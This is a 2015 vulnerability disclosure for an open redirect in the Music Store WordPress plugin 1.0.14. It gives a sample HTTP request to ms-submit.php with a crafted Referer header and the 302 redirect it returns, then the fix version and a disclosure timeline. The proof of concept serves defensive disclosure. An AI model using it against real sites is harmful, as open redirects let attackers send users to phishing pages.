WordPress Music Store 1.0.14 Open Redirect

`# Title: Open Redirect Vulnerability in Music Store Wordpress Plugin v1.0.14  
# Submitter: Nitin Venkatesh  
# Product: Music Store Wordpress Plugin  
# Product URL: https://wordpress.org/plugins/music-store/  
# Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect')  
[CWE-601]  
# Affected Versions: v1.0.14 and possibly below.  
# Tested versions: v1.0.14  
# Fixed Version: v1.0.15  
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1178058/  
# Changelog: https://wordpress.org/plugins/music-store/changelog/  
# CVE Status: None & Fresh  
  
## Product Information:  
  
Music Store is an online store for selling audio files: music, speeches,  
narratives, everything audio. In Music Store, secure payments with PayPal.  
  
## Vulnerability Description:  
  
Adding HTTP referer to ms-core/ms-submit.php causes an Open redirect  
vulnerability  
  
## Proof of Concept:  
  
Sample HTTP Request:  
  
GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://google.com/  
Connection: keep-alive  
  
Sample HTTP Response:  
  
HTTP/1.1 302 Found  
Date: Fri, 05 Jun 2015 15:29:19 GMT  
location: https://google.com/  
Content-Length: 0  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Content-Type: text/html  
  
## Solution:  
  
Upgrade to v1.0.15  
  
## Disclosure Timeline:  
  
2015-06-05 - Discovered. Contacted developer.  
2015-06-10 - Updated v1.0.15 released  
2015-07-25 - Publishing disclosure on FD mailing list  
  
## Disclaimer:  
  
This disclosure is purely meant for educational purposes. I will in no way  
be responsible as to how the information in this disclosure is used.  
  
  
`